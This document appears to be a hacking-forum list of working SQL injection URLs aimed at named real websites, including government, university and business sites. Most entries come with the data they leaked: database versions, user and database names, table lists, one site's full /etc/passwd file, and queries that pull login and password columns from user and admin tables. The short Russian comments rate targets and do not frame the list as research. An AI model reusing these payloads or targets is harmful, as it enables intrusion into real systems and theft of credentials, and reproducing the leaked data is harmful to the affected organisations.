http://www.winchesterva.gov/news.php?id=-1+union+select+1,load_file(0x2F6574632F70617373776 4),3,4,5,6,7,8
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pop:x:100:12:Qpopper:/var/spool/mail:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
admin:x:500:100:Administrator:/home/.users/112/admin:/bin/bash
root-admin:x:0:0::/root:/bin/bash

http://www.yangshuo.gov.cn/tv/article.php?id=973+and+substring(version(),1,1)=4

http://www.harrisburgu.net/news/article.php?id=-453+union+select+1,unhex(hex(version())),3,4,5--

4.1.18-nt

http://www.sonarbangladesh.com/article.php?ID=973+and+substring(version(),1,1)=5

tlf
=) гы

http://www.universityofcalifornia.edu/cme/listing.php?event_id=-1414+UNION+SELECT+1,2,upwd,4,5,6,7,8,9,ulogin,11,1 2,13,14,15,16,17,18,19,20,21,uname,23,24,25,26,27+ FROM+users/*

Version: 4.1.13-standard-log
User uccme@klamath-vhost.ucop.edu
Db: cmesite

-------------------------------------------------------
http://awis.npaci.edu/calendar/eventdetails.php?event_id=479
Version: 5.0.51a-log
User: awis_admin@web0.sdsc.edu
Db awis

http://www.f-concord.com/history.php?year=2007+union+select+1,2,3,4,5,passw ord,7,8,login,concat_ws(0x3a,user(),version(),data base()),11,12+from+users--&month=10


fconcord_fconcor@localhost
4.1.22-standard
fconcord_fconcord

PR3

http://www.sportsarok.hu/index.php?id=-34+union+select+1,2/*
jateksarokhu@localhost:5.0.32-Debian_7etch10-log:jateksarokhu2

Хлам (5й мускул, вывод в редиректе)
http://vduplo.ru/redirect/?id=-1+union+select+1,2,3,(select+group_concat(table_na me)+AS+url+from+information_schema.tables+WHERE+ta ble_schema=0x6131393131355f31)+--+

Хлам (4й мускул)
http://drochim.net/main.php?cat=13%60+where+id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version ()),5,6,7+--+&page=0

http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(column _name+separator+0x0a),5,6,7,8,9,10,11,12,13+from+i nformation_schema.columns+where+table_name='users'--

http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),table_schema,5,6,7, 8,9,10,11,12,13+from+information_schema.columns+wh ere+table_name='users'--

http://www.planetabb.com.ar/verProducto.php?id=-435+union+select+1,2,version(),group_concat(concat _ws(0x3a3a3a3a,id,username,password)+separator+0x0 a),5,6,7,8,9,10,11,12,13+from+boating.users--

==============

Adult Site Review & Ranking

http://adultsiteranking.com/siteInfo.asp?s_idx=(select+@@version)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.apemep.org/wordpress/?page_id=10&album=3&photo=1+union+select+concat(0x3,version(),user(),d atabase())


4.1.14-Debian_5-logapemep@66.33.219.67wordpressapemep


http://www.lowcountrygoodwill.org/members/?id=1+union+select+1,2,3,4,concat_ws(0x2,version() ,user(),database()),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25/*

5.0.27-standard iponly170165@76.12.221.220 iponly170165


http://www.ji-piano.com/cgi/poll/view.html?poll_num=1+union+select+concat_ws(0x2,ve rsion(),user(),database())/*


4.0.22-log jipiano@localhost jipiano

PR 7
http://genomics.ucr.edu/news/news-details.php?id=-25+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,23--

Database Version: 5.0.81
Database name: genomics
User name: genomics@f5-snat-out1.ucr.edu

---------------------------------------------------------------------------------------------------

PR 7
http://www.namnewsnetwork.org/v2/readphoto.php?id=7814+union+select+1,2,version()+f rom+mysql.user/*

Database Version: 4.0.24-log
Database name: nnn
User name: root@localhost

PR3

http://www.formel.hr/clanak.php?id=-12384+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4/*

izlog@localhost:4.1.11-Debian_4sarge7-log:izlog

http://www.ctaholidays.net/beta/holiday_details.php?id=1+union+select+1,concat(0x2 ,version(),user(),database()),3,4,5,6,7,8,9,10,11, 12,13,14,15

5.0.81-community-logsercanak_main@localhostsercanak_ctav2

https://forum.antichat.ru/showpost.php?p=1471341&postcount=15
http://kissmir.ru/write.php?id=-1+UNION+SELECT+1,concat(DATABASE(),0x3a,USER(),0x3 a,VERSION()),3,4--
kiss:nitsik@localhost:5.0.84

БД.табла (колонки)
accordik.akk (let,art,enart,song,ensong,akk,i,kol,com,avtcom,cd ay,cmonth,cyear,mark,sday,smonth,syear,avt,link)
accordik.art (let,art,enart,kol)
baza.ids (id,name,email,pass) 0 записей

PR: 6

http://www.ghana50.gov.gh/tourism/index.php?op=dispayRestaurantsInfo&region=1&id=-76+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user( ),database(),version()),9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28+--+

ghana50_ghana50@localhost:ghana50_ghana50:5.0.67-community

http://www.tltinfo.ru/index.php?id=-12135+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user()),6,7,8,9,10,11,12/*
Database Version: 4.0.20-log
Database name: info
User name: webuser@localhost
http://www.fcneman.com/index.php?id=photos&detail=60&album=-1+union+select+concat_ws(0x3a,version(),database() ,user())--
Database Version: 5.0.81-community
Database name: fcneman_typo3
User name: fcneman_typo3@localhost

http://www.hardw.com.ua/reviews.php?id=-1+un ion+select+1,concat_ws(0 x3a,ver sion(),database(),user(),@ @versi on_compile_os)/*

Database Version: 5.0.45-community
Database name: hardw_hardw1
User name: hardw_keith@localhost
OS: unknown-linux-gnu
Из hardw_hardw1:
debates
news
phorum2_forum_group_xref
phorum2_forums
phorum2_groups
phorum2_messages
phorum2_settings
phorum2_subscribers
phorum2_user_group_xref
phorum2_user_newflags
phorum2_user_permissions
phorum2_users
reviews
sources
P.S. Проверял в гугле на антибоян. Гугл ничего не нашел.

/*+++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++*/
be-mine.ru/article.php?id=6+and+substring(@@version,1,1)=5--+
version():5
/*+++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++*/
intimdelo.ru/index.php?id=-18+union+select+1,2,3,version(),5--+
version():4.1.22-standard-log
/*+++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++*/
uaescort.com/ads/index.php?ct=girls&md=details&id=3950+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34--+
Вроде блайнд....
Version():4
/*+++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++*/
radioshanson.ru/cgi-bin/ph_guests.pl?a=ph&id=512+and+substring(@@version,1,1)=3--+
version():3
жаль....
/*+++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++*/

http://www.inksystem.biz/index.php?module=shop&cat=-1+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4
version: 4.1.22-log
database: inksystem
user: inksystem@alpha
version_compile_os: portbld-freebsd5.5

на антибоян проверял в гугл , вроде нет...

http://www.vvu.edu.gh/academics/departments/nursing/facultymember.php?id=-76+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11--

vvu0002@localhost:vvu0002_valleyview:5.0.51a-community

PR: 7

http://www.parliament.gov.tt/committee_business.php?mid=17&id=76&sid=13+and+substring(version(),1,1)=4


http://www.nusicbg.org/display/zaposleni/zaposleniDetalj.php?id=-76'+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10,11,12,13+/*+&tt=ne

dbnusicbg@localhost:nusicbg:5.0.26


http://www.np.co.tt/article.php?id=-76+union+select+concat_ws(0x3a,user(),database(),v ersion())--

NP News - npweb_man@216.157.152.2:npweb_com_np:5.0.83

http://zunia.org/directory/profile/?profuserid=-1+union+select+concat(0x2,version(),user(),databas e()),2,3,4,5+limit+1,1

5.1.30-community-logmdd@192.168.10.110mdd


http://bbs.yayu.org/look.php?id=-1+union+select+1,concat(0x3a,version(),user(),data base()),3,4,5,6,7,8,9,10,11,12,13,14/*

4.0.22161648db@localhost161648db


http://www.kuwaitleaders.com/english/?action=detail&k=1&id=1+union+select+1,2,concat_ws(0x2a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24+limit+1,1

5.0.81-community kuwaitle_mich@localhost kuwaitle_GenralDB

http://www.ausit.org/eng/search.php?type=t&id=651+and+substring(version(),1,1)=4--




PR: 4
(Одна большая ошибка)
http://www.chelindustry.ru/left_prom2.php?rr=7&idotr=7&tt=7&id_raz=-40+union+select+1,2,concat_Ws(0x3a,user(),database (),version()),4,5,6,7--

helg@localhost:helg:4.1.25-log

http://www.edl.co.nz/shop.php?action=list&id=-16+union+select+1,2,3,concat(user_name,0x3a3a3a,pa ssword),5,6,7,8,9,10+from+users--

http://www.autom.com.ua/index.php?lang_id=1&menu_id=391&content_id=239&qu_id=-4+union+select+concat_ws(0x3a,adminuser,adminpass) +from+wmp_admin--&cat_id=3
==============

http://www.max-mtk.ru/index.php?p=1&type=3&dest=93+union+select+1,2,3,4,5,6,7,8,9,10,11,conca t_ws(0x3a,user(),database(),version())--

maxmtkr6_maxima@localhost:maxmtkr6_maxima:4.0.27-log

http://domcigar.ru/acess.php?id=-233+union+select+1,2,3,4,5,6,7,8,version(),10,11,1 2,13--
5.0.67-log

http://domcigar.ru/acess.php?id=-233+union+select+1,2,3,4,5,6,7,8,group_concat(tabl e_name+separator+0x0a),10,11,12,13+from+informatio n_schema.columns--

http://www.mautner.at/?task=content&id=74+union+select+1,concat(0x2a,version(),user(), database())

5.0.51b-logdb208388_12@local3db208388_12

(PS:xss тож есть правда пассивка)

http://www.ihma.in/chapter%20news.php?ID=-20+union+select+version(),2--
5.0.81-community

http://www.laxpower.com/laxnews/news.php?story=-15877+union+select+1,2,3,4,5,6,7,8,9,10,11,version (),13,14,15,16,17,18,19,20,21,22,23,24--
4.1.22-log

http://www.sfmslaw.com/pages/cases.php?id=-234+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,unhex(hex(load_ file(0x2f6574632f706173737764))),6,7,8,9,0,1,2,3,4 ,5,6,47+from+mysql.user/*

Database Version: 4.1.11
Database name: class_action_database
User name: apshel@localhost

http://www.fisharewet.org/articles.php?id=-16+union+select+1,concat_ws(0x3a,user(),version()) ,3,4,5--

User: db2247_fishwet@64.13.192.22:
Version: 4.1.25-Debian_mt1